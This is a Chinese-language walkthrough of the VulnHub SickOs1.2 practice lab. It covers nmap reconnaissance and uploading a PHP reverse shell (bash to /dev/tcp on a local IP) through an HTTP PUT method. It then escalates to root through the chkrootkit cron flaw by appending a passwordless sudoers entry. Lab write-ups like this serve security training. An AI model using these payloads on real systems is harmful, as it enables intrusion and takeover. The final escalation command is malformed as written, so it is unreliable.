vulnhub靶场渗透之SickOs1.2渗透教程，计划任务提权、chkrootkit提权

一、信息收集

1、首先拿到靶场先扫一下ip

2025.3.7 AM 8：36

arp-scan -l
扫描同网段
nmap -sP 192.168.66.24/0

2、指纹扫描

nmap -sS -sV 192.168.66.130
指纹扫描

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)

80/tcp open  http    lighttpd 1.4.28

这里很多扫描方式，下面这种更详细一点。

nmap -p- -sV -A 192.168.66.130

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: lighttpd/1.4.28

这里一个22端口估计可以连接，一个80端口让我们去收集一下信息

3、扫描目录

dirb 192.168.66.130 dirsearch -u http://192.168.66.130/ -e * -i 200 我们先放后台扫描这，先去看看80端口

4、访问80端口

这里有张图片，翻译了一下更多像是什么启发 但是这个网页源代码好像也没有什么东西，我们回到目录扫描找找线索

这里也是指纹扫描了一下，这个lighttpd1.4.28的web服务器像是一个突破点，找找看有没有exp之类的，但是我们要想办法建立一个隧道。好在我们扫到了一个test的文档，但是这里的文件很奇怪

访问了一个文件，更像是提示

nmap --script http-methods --script-args http-methods.url-path='/test' 192.168.66.130
查询网页支持的访问方式，这里是看了其他师傅的文章学到的

这里可以上传文件

5、寻找exp

searchsploit lighttpd

貌似是没有，这里思路有点断了，还是应该在网页哪儿做文章，或者看看这个东西有没有说法OpenSSH 5.9p1这里有可以使用的，但是这种一般是建立好隧道才可以使用

6、建立隧道

这里支持PUT哪我们就可以上传一个反弹shell，然后本机开监听，这样也可以建立一个隧道

vi shell.php
<?php system("bash -c 'sh -i &>/dev/tcp/192.168.66.129/4444 0>&1'");?>
这里是将上面代码写入一个php文件中，这里的ip是本机的ip，让靶机连接我们

curl -v -T shell.php -H 'Expect:'"http://192.168.66.130/test/"
这里就是以put方式将shell.php上传到靶机网站

记得上传时候开一个nc监听即可

这里已经上传成功了我们的shell.php，开一个监听然后在网页上点击就能连接上了，然后修复一下这个shell

python -c 'import pty;pty.spawn("/bin/bash")'

修复shell这样我们的shell就是一个完整的了，剩下的就是我们开始信息收集

7、寻找exp

查看了一下版本内核

ls -l /etc/cron*
查看一下定时任务

查找具有 Setuid 权限的文件
find / -perm -u=s -type f 2>/dev/null

监听端口和进程信息
netstat -lntp

查看计划任务

cat /etc/crontab

-rwxr-xr-x 1 root root  2032 Jun  4  2014 chkrootkit 这里chkrootkit是一个工具，看了其他师傅的文章才知道的 那我们就找相关exp

8、提权

这里有个txt，先尝试尝试，这个exp就是说我们在tmp中以非root用户创建一个update文件，然后这个文件会以chkrootkit（uid=0）的身份来运行，我们将update中的命令追加到sudoers文件中，允许www-data用户无需密码执行任何sudo命令。 这时我们就能直接使用root权限而不需要密码

echo"echo 'www-data ALL=NOPASSWD: ALL' >> /etc/sudoers">1
这条代码就是将www-date（普通身份用户）创建一个root

2025.3.7 AM 10：32 总结：这个靶机感觉就是拓展知识面，然后更熟练打靶流程和手感吧。然后就是提权命令，又多了一种提权方式吧。就是sudoers文件下可以操作的一些操作和套路，ok今天第一台靶机也是完成了，这个算是比较简单的了。也是从8点打到了10：30，还可以。接下来就去赶下一台靶机了

后续我也会出更多打靶文章，希望大家关注！谢谢。